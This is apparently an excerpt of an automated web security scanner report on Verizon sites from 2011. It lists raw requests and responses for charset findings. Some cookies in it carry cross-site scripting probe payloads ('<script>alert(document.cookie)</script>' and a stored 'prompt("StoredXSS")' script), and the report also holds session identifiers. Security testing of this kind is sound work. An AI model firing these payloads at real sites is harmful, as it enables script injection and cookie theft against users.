Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 62922
Content-Type: text/html
X-N: S
Date: Mon, 05 Sep 2011 22:23:19 GMT
Connection: close


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<link href="/wholesale/includes/styles/ws_global.css" rel="styl
...[SNIP]...

24.49. https://www22.verizon.com/foryourhome/registration/forgotuid/javascript:void(0)

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /foryourhome/registration/forgotuid/javascript:void(0)

Request

GET /foryourhome/registration/forgotuid/javascript:void(0) HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Expires: Mon, 05 Sep 2011 22:38:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:38:01 GMT
Connection: close

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

24.50. https://www22.verizon.com/includes/javascript/commonjs/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/javascript/commonjs/

Request

GET /includes/javascript/commonjs/ HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Content-Type: text/html
Date: Mon, 05 Sep 2011 22:21:41 GMT
Content-Length: 18981
Connection: keep-alive
Set-Cookie: ak-sf=false; expires=Mon, 05-Sep-2011 22:26:41 GMT; path=/includes/; domain=verizon.com


var arrHost=(window.location.hostname).split('.');
var scbCkDom='.'+arrHost[arrHost.length-2]+'.'+arrHost[arrHost.length-1];

/* detect.js */

var agt=navigator.userAgent.toLowerCase();
va
...[SNIP]...

24.51. https://www22.verizon.com/includes/javascript/oo_engine_c.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /includes/javascript/oo_engine_c.js

Request

GET /includes/javascript/oo_engine_c.js HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; vsrecentsearches=wss~xss~xss%20sq~~; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f145525d5f4f58455e445a4a423660; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Content-Type: text/html
Date: Mon, 05 Sep 2011 22:21:46 GMT
Content-Length: 29881
Connection: keep-alive


var OnlineOpinion=new Object();OnlineOpinion.util={SafeAddOnLoadEvent:function(func){if(!document.getElementById|!document.getElementsByTagName)return;var oldonload=window.onload;if(typeof window.
...[SNIP]...

24.52. https://www22.verizon.com/myverizon/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /myverizon/

Request

GET /myverizon/ HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=verizon+online+news+webmail
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; PDSS=PflowId=680d1ca400d842e69be1848a9f3d28c5; DSS=flowId=f9688e84baaa4126acd87151b526b588; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=VwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxAA==&IP=NQAwAC4AMgAzAC4AMQAyADMALgAxADAANgAsACAAOAAwAC4ANgA3AC4ANwA0AC4AMgAxADEALAAgADEAMQAyAC4ANgA0AC4AMQAuADEAMAA3AA==; 
vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; urlreferer=http://smallbusiness.verizon.com/products/voice/plans.aspx; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; SrcClientID=smallbusiness.verizon.com; vzAppID=; LOB_CATEGORY=; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; AimsChatURL_Cookie=https://collaborateext.verizon.com; PageTitle=Livechat; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>alert(document.cookie)</script>af81f92fd39; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/residentialhelp/phone; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520FiOS%2520TV@http%253A//www22.verizon.com/residentialhelp/fiostv%23Verizon%2520%257C%2520-%2520How%2520do%2520I%2520use%2520Ask%2520Verizon%253F@http%253A//www22.verizon.com/ResidentialHelp/Generic/Ask%252520Verizon/Getting%252520Started/124519.htm%23; 
TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Content-Length: 298
Cache-Control: private, max-age=1203
Date: Mon, 05 Sep 2011 22:41:48 GMT
Connection: keep-alive

<!-- Vignette V6 Mon Sep 05 14:01:51 2011 -->


<!-- -->
<html>
<head>
   <title>Verizon | My Verizon Login</title>
   <meta http-equiv="refresh" content="0;URL=http://www22.verizon.com/Foryourhom
...[SNIP]...

24.53. https://www22.verizon.com/vzTracker/vzTracker.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /vzTracker/vzTracker.aspx

Request

GET /vzTracker/vzTracker.aspx?appName=ECSP_OLH&type=1&requestUrl=http%3A//www22.verizon.com/ResidentialHelp/Generic/Ask%2520Verizon/Getting%2520Started/124519.htm&referrer=http%3A//www22.verizon.com/residential/fiostv%3FCMP%3DDMC-CV090057%23&Title=Verizon%20%7C%20-%20How%20do%20I%20use%20Ask%20Verizon%3F&Lang=en-US&scrRes=1920X1200&scrdepth=16&id=2638553949072.957 HTTP/1.1
Host: www22.verizon.com
Connection: keep-alive
Referer: http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; CMS_TimeZoneOffset=300; CP=null*; refURL=http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html
Expires: Mon, 05 Sep 2011 22:24:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:12 GMT
Content-Length: 1034
Connection: keep-alive


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>vzTracker</title>
       <meta content="Microsoft Visual Studio 7.0" name="GENERATOR">
       <meta content="C#" na
...[SNIP]...

25. HTML uses unrecognised charset
There are 10 instances of this issue:

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


25.1. http://search.vzw.com/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://search.vzw.com
Path:   /

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET / HTTP/1.1
Host: search.vzw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:35:40 GMT
Server: Atomz/1.0
Content-Type: text/html
Via: 1.1 center.atomz.com:90
X-Cache: MISS from center.atomz.com
Connection: close
Content-Length: 79416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Verizon Wireless Se
...[SNIP]...
<meta name="m4" content="|" />

   <meta http-equiv="content-type" content="text/html; charset=latin-1" />
   <meta http-equiv="Content-Language" content="en-us" />
...[SNIP]...

25.2. https://secure.opinionlab.com/ccc01/comment_card.asp

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card.asp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /ccc01/comment_card.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 7518
Content-Type: text/html; Charset=UTF-8
Cool02: Opinionlab - Cool02
Date: Mon, 05 Sep 2011 22:35:39 GMT
Connection: close

<!--TEMPLATE version 3.4 UNIVERSAL CSS: 0 ...--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<title>Comment
...[SNIP]...

25.3. https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp

Summary

Severity:   Information
Confidence:   Tentative
Host:   https://secure.opinionlab.com
Path:   /ccc01/comment_card_json_4_0_b.asp

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /ccc01/comment_card_json_4_0_b.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 8154
Content-Type: text/html; Charset=UTF-8
Cool01: Opinionlab - Cool01
Set-Cookie: ASPSESSIONIDAAAQCDSR=CBJOPHDCDACKEPKDCCMHHGPC; path=/
Date: Mon, 05 Sep 2011 22:35:41 GMT
Connection: close

<!--TEMPLATE version 3.6 UNIVERSAL CSS ON PAGE b: 0 ...--><html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-16">
<base href="https://secure.opinionlab.com/ccc01">
<titl
...[SNIP]...

25.4. http://www22.verizon.com/ResidentialHelp/FiOSTV/Guide/Enhanced+TV/QuestionsOne/124941.htm

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www22.verizon.com
Path:   /ResidentialHelp/FiOSTV/Guide/Enhanced+TV/QuestionsOne/124941.htm

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /ResidentialHelp/FiOSTV/Guide/Enhanced+TV/QuestionsOne/124941.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 248796
Expires: Mon, 05 Sep 2011 22:37:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:24 GMT
Connection: close
Set-Cookie: ContextInfo_Partner=VZO; path=/
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>prompt("StoredXSS")</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:37:24 GMT; path=/
Set-Cookie: ContextInfo_TV=FiOSTV; expires=Wed, 05-Sep-2012 22:37:24 GMT; path=/
Set-Cookie: ECSPCookies=Partner=VZO&SolutionCenter=FiOSTV&OOFState=&SupportCenter=&Internet=&TV=FiOSTV&Wireless=110ed<script>prompt("StoredXSS")</script>af81f92fd39; expires=Wed, 05-Sep-2012 22:37:24 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<HEAD id="ctl00_head"><title>
   Verizon | F
...[SNIP]...
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Visual    Studio 7.0" name="GENERATOR" />
...[SNIP]...

25.5. http://www22.verizon.com/ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www22.verizon.com
Path:   /ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /ResidentialHelp/Generic/Ask%20Verizon/Getting%20Started/124519.htm HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; refURL=http://www22.verizon.com/residential/fiostv?CMP=DMC-CV090057#; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; CP=null*; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 230802
Expires: Mon, 05 Sep 2011 22:24:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:24:09 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" >
<HEAD id="ctl00_head"><title>
   Verizon |
...[SNIP]...
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Visual    Studio 7.0" name="GENERATOR" />
...[SNIP]...

25.6. http://www22.verizon.com/content/ContactUs/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www22.verizon.com
Path:   /content/ContactUs/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /content/ContactUs/ HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
